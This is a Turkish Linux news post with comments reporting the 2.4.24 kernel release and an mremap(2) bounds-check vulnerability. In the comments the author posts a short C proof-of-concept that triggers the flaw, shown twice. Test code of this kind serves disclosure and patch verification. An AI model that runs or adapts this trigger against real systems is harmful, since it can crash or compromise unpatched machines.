Kernel 2.4.24 Çıktı

0
bahadirkandemir
bahadirkandemir
6 Ocak 2004 , 1 dakika okuma süresi
Kernel'in bellek yönetim kodunda, mremap(2) sistem çağrısındaki hatalı sınır kontrolünden kaynaklanan bir güvenlik zayıflığı bulundu.

mremap sistem çağrısı, sanal bellek alanlarının adreslenebilir boşluklarını taşımak ve boyutlarını değiştirme imkanı sağlıyor.

Duyurunun tamamı: http://isec.pl/vulnerabilities/isec-0013-mremap.txt
linux
3
Linkedin Facebook Twitter Google plus

Görüşler

bahadirkandemir
0
bahadirkandemir
NOT: Bu zayıflığın 2.2, 2.4 ver 2.6 serilerinde olduğu belirtilmişti ancak, zayıflığı keşfeden güvenlik grubu bu açığın MREMAP_FIXED bayrağını desteklemeyen 2.2 serilerinde olmadığını önemli güvenlik listelerinde duyurdu.

Kernel 2.6.0'da aynı zayıflığın olduğu duyurulmuştu, 2.6.1-rc1'de zayıflığın giderilmediği, 2.6.1-rc2'de giderildiği ek bir açıklama ile duyuruldu.

Zayıflığı test etmek isteyenler aşağıdaki kodu deneyebilir:

#include
#include
#include
#include

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
realist
0
realist
ne #include ediyoruz?
hangi #include ?
bahadirkandemir
0
bahadirkandemir
Sanırım < ve > karakterleri sorun yarattı. 2 kere önizleme yapmamdan kaynaklandı.

----------------------------------------------

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
Görüş belirtmek için giriş yapın...

İlgili Yazılar

Vector Linux 4.0 çıktı
GaripFakir
9 Ekim 2003, 1 dakika okuma süresi

Vector Linux'un 4.0 versiyonu çıktı. Vector Linux sade ve güçlü yapısıyla kendisine Linux dünyasında yer edinen Slackware Linux'a zenginleştirilmiş masaüstü ve otomatik donanım tanıma özellikleri ilave edilmesiyle ortaya çıkan bir dağıtım.

Yeni versiyon Slackware 9.0 ve 2.4.22 kernel tabanlı.

Ödül Avcısı Aranıyor!
cbc
24 Kasım 2003, 1 dakika okuma süresi

Slashdot´ı gezerken bir Gnome haberi gözüme çarptı. Çeşitli uygulamalara yeni özelllikler ekleyecek, para ile çalışan programcılar, bir nevi ödül avcıları arıyorlarmış. Para vaad edilen işlerden bazıları ise şöyle:

Gnome - Mozilla arası sürükle - bırak: 300 $
Paneldeki saat ile takvim uyumu: 1.000 $
Gaim listesi - adres defteri bağlantısı: 2.500 $

14,000 PC Windows'dan LİNUX'a Geçiyor
malkocoglu
29 Mayıs 2003, 1 dakika okuma süresi

Münih belediyesi, Windows'dan vazgeçip, 14,000 makinasına Linux yükleyecek. Bu olay, masaüstü ortamda Linux'un yerini ispatlayan önemli bir gelişme.

http://www.desktoplinux.com/news/NS3199247984.html

Gazi Üniversitesi´nde olup da İTÜ ve Boğaziçi´nde olmayan!
sundance
16 Eylül 2003, 3 dakika okuma süresi

Deniz ? Kesinlikle hayır. Güzel bir kampüs ? Boğaziçi daha iyi :)
Peki nedir Gazi Üniversitesinde olup da ITU ve Boğaziçinde olmayan ?

Internetten rahat rahat, adam gibi kaydolabilmek! Ne o şaşırdınız mı ? O zaman, siz son zamanlarda ITU ve Boğaziçinin muhteşem kayıt sayfalarına girip, web serverın boş bir anını bulamadığınızdan dolayı saçınızı başınızı yolmadınız.

Her yıl üç dört günlük süreye sıkıştırılan bu kayıt eziyeti, Internet üzerinde tamamen işkenceye dönmüş durumda. Geçe dörtte uyanıp kaydolmaya çalışanlar mı dersiniz, okulun laboratuvarlarına gidip ordan sisteme girmeye çalışanlar mı ?

Peki Sun'dı Oracle'dı hiçbir masraftan kaçınmayan bu üniversitelerin yapamadığı da Gazi'nin yapabildiği nedir ? Tabi ki GNU/Linux çözümü ;) geçici bir cluster...

Oracle Kendi Linux Dağıtımını İstiyor
maeqlin
20 Nisan 2006, 1 dakika okuma süresi

Oracle CEO'su Larry Ellison, Financial Times'a yaptığı açıklamaya göre piyasaya hakim iki GNU/Linux distrosundan birini satın almak istediklerini belirtmiş.